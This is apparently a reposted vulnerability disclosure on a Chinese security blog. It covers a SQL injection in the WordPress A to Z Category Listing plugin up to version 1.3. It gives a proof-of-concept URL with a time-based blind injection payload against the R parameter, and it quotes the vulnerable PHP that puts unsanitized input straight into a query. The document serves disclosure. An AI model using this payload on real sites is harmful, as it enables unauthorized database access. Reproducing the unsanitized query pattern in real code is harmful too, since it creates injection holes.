WordPress A to Z Category Listing plugin

# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability
# Date: 2011-09-09
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip
# Version: 1.3 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.xxx.com/wp-content/plugins/a-to-z-category-listing
/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5
(CHAR(115,113,108,109,97,112))),0)--%20
 
---------------
Vulnerable code
---------------
$init_letter = $_GET['R'];
$sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."
term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy =
'category' and wpt.term_id = wptt.term_id";
...
$sql_rec = $wpdb->get_results($sql);

本文固定链接: https://www.unhonker.com/bug/216.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年09月09日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WordPress A to Z Category Listing plugin | 90' s Blog|关注网络信息安全

WordPress A to Z Category Listing plugin:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!